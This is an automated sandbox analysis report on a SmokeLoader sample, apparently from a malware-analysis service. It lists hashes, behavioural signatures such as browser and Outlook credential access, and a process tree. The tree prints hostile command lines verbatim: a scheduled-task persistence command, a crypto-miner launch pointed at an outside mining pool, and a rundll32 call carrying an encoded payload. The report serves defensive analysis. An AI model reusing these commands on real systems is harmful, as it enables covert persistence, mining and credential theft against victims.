Analysis
-
max time kernel
152s -
max time network
141s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
10-12-2022 08:02
Static task
static1
Behavioral task
behavioral1
Sample
75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe
Resource
win10v2004-20220901-en
General
-
Target
75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe
-
Size
319KB
-
MD5
7e41f5753ed8d35687df470f3409bad1
-
SHA1
43080c7f6bd0c2458342d6f92c58e9491f5b5d02
-
SHA256
75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e
-
SHA512
8de8644976af6fc6a0c3e9515f1e9c9419390bb12583ea63b8945a502963637e02ff87e7f081323a5eb09fe24af138a70a325f0cc13e20353198eb3917d41185
-
SSDEEP
3072:wXuWAqqLvVZePF6CcL5mRR9pmePA0qabKZXwqTiKdwTeB9yyOYW6Al2IYInW:klA1LSPF6CcAfVPTKFdDwTO9iflXYCW
Malware Config
Signatures
-
Babadeda Crypter 2 IoCs
resource yara_rule behavioral1/files/0x0004000000022e05-180.dat family_babadeda behavioral1/memory/1932-217-0x00000000065A0000-0x00000000065E0000-memory.dmp family_babadeda -
Detects Smokeloader packer 1 IoCs
resource yara_rule behavioral1/memory/5028-136-0x0000000002050000-0x0000000002059000-memory.dmp family_smokeloader -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 106 1288 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
pid Process 1416 1993.exe 1788 685364724-8a9Ah054og8jEcGP.exe 2772 4F88.exe 1932 text.exe 4052 GaCFiA2Z63.exe 2228 V.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 1993.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 4F88.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation V.exe -
Loads dropped DLL 11 IoCs
pid Process 2772 4F88.exe 2772 4F88.exe 1932 text.exe 1932 text.exe 1932 text.exe 1932 text.exe 1932 text.exe 1932 text.exe 1932 text.exe 1932 text.exe 1288 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum text.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 text.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2228 set thread context of 1088 2228 V.exe 121 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 5092 1288 WerFault.exe 120 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 text.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString text.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5016 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3936 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS text.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer text.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName text.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion text.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5028 75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe 5028 75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3068 Process not Found -
Suspicious behavior: MapViewOfSection 19 IoCs
pid Process 5028 75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found 3068 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1416 1993.exe Token: SeIncreaseQuotaPrivilege 2440 wmic.exe Token: SeSecurityPrivilege 2440 wmic.exe Token: SeTakeOwnershipPrivilege 2440 wmic.exe Token: SeLoadDriverPrivilege 2440 wmic.exe Token: SeSystemProfilePrivilege 2440 wmic.exe Token: SeSystemtimePrivilege 2440 wmic.exe Token: SeProfSingleProcessPrivilege 2440 wmic.exe Token: SeIncBasePriorityPrivilege 2440 wmic.exe Token: SeCreatePagefilePrivilege 2440 wmic.exe Token: SeBackupPrivilege 2440 wmic.exe Token: SeRestorePrivilege 2440 wmic.exe Token: SeShutdownPrivilege 2440 wmic.exe Token: SeDebugPrivilege 2440 wmic.exe Token: SeSystemEnvironmentPrivilege 2440 wmic.exe Token: SeRemoteShutdownPrivilege 2440 wmic.exe Token: SeUndockPrivilege 2440 wmic.exe Token: SeManageVolumePrivilege 2440 wmic.exe Token: 33 2440 wmic.exe Token: 34 2440 wmic.exe Token: 35 2440 wmic.exe Token: 36 2440 wmic.exe Token: SeIncreaseQuotaPrivilege 2440 wmic.exe Token: SeSecurityPrivilege 2440 wmic.exe Token: SeTakeOwnershipPrivilege 2440 wmic.exe Token: SeLoadDriverPrivilege 2440 wmic.exe Token: SeSystemProfilePrivilege 2440 wmic.exe Token: SeSystemtimePrivilege 2440 wmic.exe Token: SeProfSingleProcessPrivilege 2440 wmic.exe Token: SeIncBasePriorityPrivilege 2440 wmic.exe Token: SeCreatePagefilePrivilege 2440 wmic.exe Token: SeBackupPrivilege 2440 wmic.exe Token: SeRestorePrivilege 2440 wmic.exe Token: SeShutdownPrivilege 2440 wmic.exe Token: SeDebugPrivilege 2440 wmic.exe Token: SeSystemEnvironmentPrivilege 2440 wmic.exe Token: SeRemoteShutdownPrivilege 2440 wmic.exe Token: SeUndockPrivilege 2440 wmic.exe Token: SeManageVolumePrivilege 2440 wmic.exe Token: 33 2440 wmic.exe Token: 34 2440 wmic.exe Token: 35 2440 wmic.exe Token: 36 2440 wmic.exe Token: SeShutdownPrivilege 3068 Process not Found Token: SeCreatePagefilePrivilege 3068 Process not Found Token: SeIncreaseQuotaPrivilege 5068 WMIC.exe Token: SeSecurityPrivilege 5068 WMIC.exe Token: SeTakeOwnershipPrivilege 5068 WMIC.exe Token: SeLoadDriverPrivilege 5068 WMIC.exe Token: SeSystemProfilePrivilege 5068 WMIC.exe Token: SeSystemtimePrivilege 5068 WMIC.exe Token: SeProfSingleProcessPrivilege 5068 WMIC.exe Token: SeIncBasePriorityPrivilege 5068 WMIC.exe Token: SeCreatePagefilePrivilege 5068 WMIC.exe Token: SeBackupPrivilege 5068 WMIC.exe Token: SeRestorePrivilege 5068 WMIC.exe Token: SeShutdownPrivilege 5068 WMIC.exe Token: SeDebugPrivilege 5068 WMIC.exe Token: SeSystemEnvironmentPrivilege 5068 WMIC.exe Token: SeRemoteShutdownPrivilege 5068 WMIC.exe Token: SeUndockPrivilege 5068 WMIC.exe Token: SeManageVolumePrivilege 5068 WMIC.exe Token: 33 5068 WMIC.exe Token: 34 5068 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1932 text.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3068 wrote to memory of 1416 3068 Process not Found 83 PID 3068 wrote to memory of 1416 3068 Process not Found 83 PID 3068 wrote to memory of 1416 3068 Process not Found 83 PID 1416 wrote to memory of 1788 1416 1993.exe 88 PID 1416 wrote to memory of 1788 1416 1993.exe 88 PID 1788 wrote to memory of 2440 1788 685364724-8a9Ah054og8jEcGP.exe 91 PID 1788 wrote to memory of 2440 1788 685364724-8a9Ah054og8jEcGP.exe 91 PID 1788 wrote to memory of 4740 1788 685364724-8a9Ah054og8jEcGP.exe 93 PID 1788 wrote to memory of 4740 1788 685364724-8a9Ah054og8jEcGP.exe 93 PID 4740 wrote to memory of 5068 4740 cmd.exe 95 PID 4740 wrote to memory of 5068 4740 cmd.exe 95 PID 1788 wrote to memory of 4736 1788 685364724-8a9Ah054og8jEcGP.exe 96 PID 1788 wrote to memory of 4736 1788 685364724-8a9Ah054og8jEcGP.exe 96 PID 4736 wrote to memory of 4920 4736 cmd.exe 98 PID 4736 wrote to memory of 4920 4736 cmd.exe 98 PID 3068 wrote to memory of 2772 3068 Process not Found 99 PID 3068 wrote to memory of 2772 3068 Process not Found 99 PID 3068 wrote to memory of 2772 3068 Process not Found 99 PID 3068 wrote to memory of 4680 3068 Process not Found 100 PID 3068 wrote to memory of 4680 3068 Process not Found 100 PID 3068 wrote to memory of 4680 3068 Process not Found 100 PID 3068 wrote to memory of 4680 3068 Process not Found 100 PID 3068 wrote to memory of 3404 3068 Process not Found 101 PID 3068 wrote to memory of 3404 3068 Process not Found 101 PID 3068 wrote to memory of 3404 3068 Process not Found 101 PID 3068 wrote to memory of 1452 3068 Process not Found 102 PID 3068 wrote to memory of 1452 3068 Process not Found 102 PID 3068 wrote to memory of 1452 3068 Process not Found 102 PID 3068 wrote to memory of 1452 3068 Process not Found 102 PID 2772 wrote to memory of 1932 2772 4F88.exe 103 PID 2772 wrote to memory of 1932 2772 4F88.exe 103 PID 2772 wrote to memory of 1932 2772 4F88.exe 103 PID 3068 wrote to memory of 4428 3068 Process not Found 104 PID 3068 wrote to memory of 4428 3068 Process not Found 104 PID 3068 wrote to memory of 4428 3068 Process not Found 104 PID 3068 wrote to memory of 5112 3068 Process not Found 105 PID 3068 wrote to memory of 5112 3068 Process not Found 105 PID 3068 wrote to memory of 5112 3068 Process not Found 105 PID 3068 wrote to memory of 5112 3068 Process not Found 105 PID 3068 wrote to memory of 1524 3068 Process not Found 106 PID 3068 wrote to memory of 1524 3068 Process not Found 106 PID 3068 wrote to memory of 1524 3068 Process not Found 106 PID 3068 wrote to memory of 1524 3068 Process not Found 106 PID 1788 wrote to memory of 3612 1788 685364724-8a9Ah054og8jEcGP.exe 107 PID 1788 wrote to memory of 3612 1788 685364724-8a9Ah054og8jEcGP.exe 107 PID 3068 wrote to memory of 4456 3068 Process not Found 109 PID 3068 wrote to memory of 4456 3068 Process not Found 109 PID 3068 wrote to memory of 4456 3068 Process not Found 109 PID 3068 wrote to memory of 4456 3068 Process not Found 109 PID 3612 wrote to memory of 4052 3612 powershell.exe 110 PID 3612 wrote to memory of 4052 3612 powershell.exe 110 PID 3068 wrote to memory of 4492 3068 Process not Found 111 PID 3068 wrote to memory of 4492 3068 Process not Found 111 PID 3068 wrote to memory of 4492 3068 Process not Found 111 PID 4052 wrote to memory of 3912 4052 GaCFiA2Z63.exe 112 PID 4052 wrote to memory of 3912 4052 GaCFiA2Z63.exe 112 PID 3068 wrote to memory of 2760 3068 Process not Found 114 PID 3068 wrote to memory of 2760 3068 Process not Found 114 PID 3068 wrote to memory of 2760 3068 Process not Found 114 PID 3068 wrote to memory of 2760 3068 Process not Found 114 PID 3912 wrote to memory of 3936 3912 cmd.exe 115 PID 3912 wrote to memory of 3936 3912 cmd.exe 115 PID 3912 wrote to memory of 2228 3912 cmd.exe 116 PID 3912 wrote to memory of 2228 3912 cmd.exe 116 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook rundll32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe"C:\Users\Admin\AppData\Local\Temp\75c776cde19a4520608cc886704eb2623b274c6d7662079a292370d03a82c61e.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5028
-
C:\Users\Admin\AppData\Local\Temp\1993.exeC:\Users\Admin\AppData\Local\Temp\1993.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Users\Admin\AppData\Local\Temp\685364724-8a9Ah054og8jEcGP.exe"C:\Users\Admin\AppData\Local\Temp\685364724-8a9Ah054og8jEcGP.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\System32\Wbem\wmic.exewmic os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"3⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name4⤵PID:4920
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "" "start-process C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe"C:\Users\Admin\AppData\Local\Temp\GaCFiA2Z63.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp76B6.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:3936
-
-
C:\ProgramData\SystemInformation\V.exe"C:\ProgramData\SystemInformation\V.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:2228 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"7⤵PID:3244
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "V" /tr "C:\ProgramData\SystemInformation\V.exe"8⤵
- Creates scheduled task(s)
PID:5016
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RCMiP9SrgQ54AMjhmbUTCtkeoHVVHvADHw.spaceteam -p x -t 57⤵PID:1088
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls8⤵PID:1008
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4F88.exeC:\Users\Admin\AppData\Local\Temp\4F88.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe"C:\Users\Admin\AppData\Roaming\Text Productivity Tools\text.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Maps connected drives based on registry
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:1932 -
C:\Windows\system32\rundll32.exe"C:\Users\Admin\AppData\Roaming\nsis_unse579923.dll",PrintUIEntry |5CQkOhiAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAOVkHwBs8|AtBXEANu8AUgBYNwBIAFWuGwBwADQ9AGwnAGb+LQJZSIPsKOgE|wIAAEiDxCjD|8zMzEyJRCQY|0iJVCQQSIlM+yQIWQFIi0QkMG9IiQQkfQE4SGsAvwhIx0QkEC0B630OfQEQSIPAAYsB3RB9AUBIOZIAcyX+mwOLDCRIA8hIX4vBSItMpwFUdwD|A9FIi8qKCYj3COvBYgVlSIsE+yVg8|AzyUiLUP8YSDvRdDZIg||CIEiLAkg7wv90KmaDeEgYdf8aTItAUGZBg+84a3QHDRFLdQj+DRB4EC50BUiLvwDr1UiLSPkAwf5mAEBTVVZXQVS|QVVBVkFXWQFm|4E5TVpNi|hM|4vySIvZD4X8|vPwTGNJPEGBPP8JUEUAAA+F6r7z8EGLhAmI8|CF|8BIjTwBD4TW3mYRg7wJjC0BD4T9x|PwRItnIESL|18ci3ckRItP|xhMA+FMA9lI|wPxM8lFhckP+4Sk8|BNi8RBi|8QRTPSSAPTiv8ChMB0HUHByu8ND77A9gABRAP90LsRdexBgfqq||wNfHQOg8EB|0mDwARBO8lz|2nrxovBD7cM|05FiyyLTAPr73RYM+2mEHRRQfuLFL0A0zPJigJ|TIvC6w|BycQRewPI4RABQYoA0RD|7TPAM|ZBOwz5ttwQogCDxgGD+P8Icu7rCkiLy|9B|9VJiQT3g|3F4BDEBDtvGHL9r2IBQV9BXkFdv0FcX15dWy8XSO+B7GABYACL6ej|Zv7||0iFwA9bhJlxIEyNqwGLJxDfyDP|6Jt5II1f|wRMjUVCM9KL38v|VCRofCBMi6|gD4RscSBFpBAz98CL040gSIl8JPUgoiBwfCBIi|AP84RMcSCiIFBIjVb|CESNR0BIjYz9JIERSIvY6Hz9rnogjVZI2iAQ3iHM9vPw6GfrIESLBo3TVwg9IKIgWMYhiYRrJICDEt3z8IsO1iCPWImMJG0RAzCNIOj9MesgTItdOous7ikySIucFjJMiWT|JDhEjWdsSTt77EiGIDBMiVyAATeEJNyDEYaO4yHfIP3wrBNIi9Po5|x2ATCKnHMySI2EczL|QYDzIUmLzET7MBigAoPpAXXz+4G8czIhUmV4dd9Ki4Qk9B4xlCT9+PPwA8JIO+hy|zVBO9R2MESN|0lASSvUQbgA9JQAoiBAxiL4dBdEvLQwvjFIjVNsjSBN7yvE6GyAMEiLzv6iIHhIhf90FEz8jDAXMUiNTCRAun0D8|D|10iBxHAhBl0kAAA=3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
PID:1288 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1288 -s 7204⤵
- Program crash
PID:5092
-
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4680
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3404
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1452
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4428
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5112
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1524
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4456
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:4492
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2760
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 1288 -ip 12881⤵PID:4576
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
892KB
MD56bcdb0510f46aa502aef2378f79434bf
SHA1f46e3ca6042354f2d81228d3648e8ba5c96b7867
SHA2568b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b
SHA51273b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63
-
Filesize
892KB
MD56bcdb0510f46aa502aef2378f79434bf
SHA1f46e3ca6042354f2d81228d3648e8ba5c96b7867
SHA2568b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b
SHA51273b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63
-
Filesize
922KB
MD50cec15477b0a89e89f78961fdd2f56b8
SHA148701957b74b12cfb521c8881ec9beac78f8866d
SHA25603de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351
SHA5121c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595
-
Filesize
922KB
MD50cec15477b0a89e89f78961fdd2f56b8
SHA148701957b74b12cfb521c8881ec9beac78f8866d
SHA25603de8297c43f7161e56416e5f7180bee53b5234f5c4f757cb0084b9603057351
SHA5121c8162b29d77035c23148cad569162f739ddc0c501fbf9dbc7cb06ffeaa7eb69d3f505aee167700eeba65fa6cab62ce92e3270b6d694f6f07192d8d3819ec595
-
Filesize
15.6MB
MD52b0b6f7adb2c4f30a25aa73f19eb69de
SHA16856ec4a84ba879e8118bbe8fd89237f12977a7e
SHA2565d270c5f31a22248cc088654d6ea6f293d000e3780ed1d0e180ea005b6e120bd
SHA5124018b7127fe13b8f4ccfd4ad5ac842e4e56e2f4c8637cdaca34b614106724ba24c57d572e11643b89265cfbed128016edf60c0b823224d45004c82585e473b62
-
Filesize
15.6MB
MD52b0b6f7adb2c4f30a25aa73f19eb69de
SHA16856ec4a84ba879e8118bbe8fd89237f12977a7e
SHA2565d270c5f31a22248cc088654d6ea6f293d000e3780ed1d0e180ea005b6e120bd
SHA5124018b7127fe13b8f4ccfd4ad5ac842e4e56e2f4c8637cdaca34b614106724ba24c57d572e11643b89265cfbed128016edf60c0b823224d45004c82585e473b62
-
Filesize
4.5MB
MD5210d0e2a6972569ae0cc2e191610ede7
SHA174080b265b2f29cc0d2fac5b02034a9c4b6c9f22
SHA256bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d
SHA512d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a
-
Filesize
4.5MB
MD5210d0e2a6972569ae0cc2e191610ede7
SHA174080b265b2f29cc0d2fac5b02034a9c4b6c9f22
SHA256bbdda1d7ec80b360df21e711400497bbeccf3b22bbd9723f5b869378a8a0557d
SHA512d7b51dd3334c37fbabc0c0047debfc52e7febc1a590a9974bbc0453d035b3b340b35eb0f4ab3d15c235a4f4d7092915e86a3d805fc173d21a1c7fdde12a94e2a
-
Filesize
892KB
MD56bcdb0510f46aa502aef2378f79434bf
SHA1f46e3ca6042354f2d81228d3648e8ba5c96b7867
SHA2568b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b
SHA51273b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63
-
Filesize
892KB
MD56bcdb0510f46aa502aef2378f79434bf
SHA1f46e3ca6042354f2d81228d3648e8ba5c96b7867
SHA2568b707a410ca9738c7009edc0933475ce8b00d4e7bcabe25a6b35d84cae2ea81b
SHA51273b8979d06d97bc3a4223fa3df6b808b1b52cd587042763a066658fa5993af27729a04c5998c753b980318c5822f2b0523fe0200fde6cd6699e9b5eb0e7f3a63
-
Filesize
202KB
MD5142bc2bb269b896cc0f11f9021dcbc52
SHA175b09b25f8f6b3b0fc94fcdcc61d932f303ac418
SHA2565da7da9abb77790ddbb87d86b9ea4b01a4f375035827e30fa879dab8c2a737db
SHA512150ffd4e66ee126912c6a5071bec750e4b5e603af9cc79b26c63e482f7d5d0aafcae1c995f10b60ba2da138effb19c668e1515f35db3b8b7a508ef34f59d134a
-
Filesize
472KB
MD5016a5d74b1e5a4625bf1ad1aac6bfb68
SHA11a4247c53e1472e2199c12e46389ac0df172bc19
SHA256d43cb6a64b707d13ac99936e71c6be436c32a76506ed1fe462e2f9249722d487
SHA512f635d56caf1d50e6ad8c5074d0840cdb127380898f5e63b53c0eda1a7230012e4ba622d3639d6ef72bde1250c500fc798b5ef90ff07b53f1eb3343034fb6f3a7
-
Filesize
147B
MD5a3903e722030bbbc7337a62d03da1cb4
SHA18a110411d95bfe6fb6af11f7e5c7f3ed7656387f
SHA2568b0203656dabc97ae5ff0f4893ec430f02989627d1d5efa90c309450dec16271
SHA512562a722fee804e7a9b68fe48667a880fd9d2922498950d2f5d257b521ff3eb5219e849f53086dc035f9e0115df2c548804cde1b2041e1183479170ce65764dd3
-
Filesize
437KB
MD5a8d72f9e1e75420cea790ebb071a3810
SHA1ba6ab45d2b14cb43bfd952aca642e071ff4784e9
SHA256c0cd8aab3a4b3f9ca22378c79ccb012875d3b717ca5646436193a632164be012
SHA51221acad06fcf5f95472b893440d12c20a95743271f7341f431f2f0f14b92e3d12c7a91c09228f812cca3a61b7fa413766699b49ffc17197b92acc9f3f5787f7f6
-
Filesize
437KB
MD5a8d72f9e1e75420cea790ebb071a3810
SHA1ba6ab45d2b14cb43bfd952aca642e071ff4784e9
SHA256c0cd8aab3a4b3f9ca22378c79ccb012875d3b717ca5646436193a632164be012
SHA51221acad06fcf5f95472b893440d12c20a95743271f7341f431f2f0f14b92e3d12c7a91c09228f812cca3a61b7fa413766699b49ffc17197b92acc9f3f5787f7f6
-
Filesize
428KB
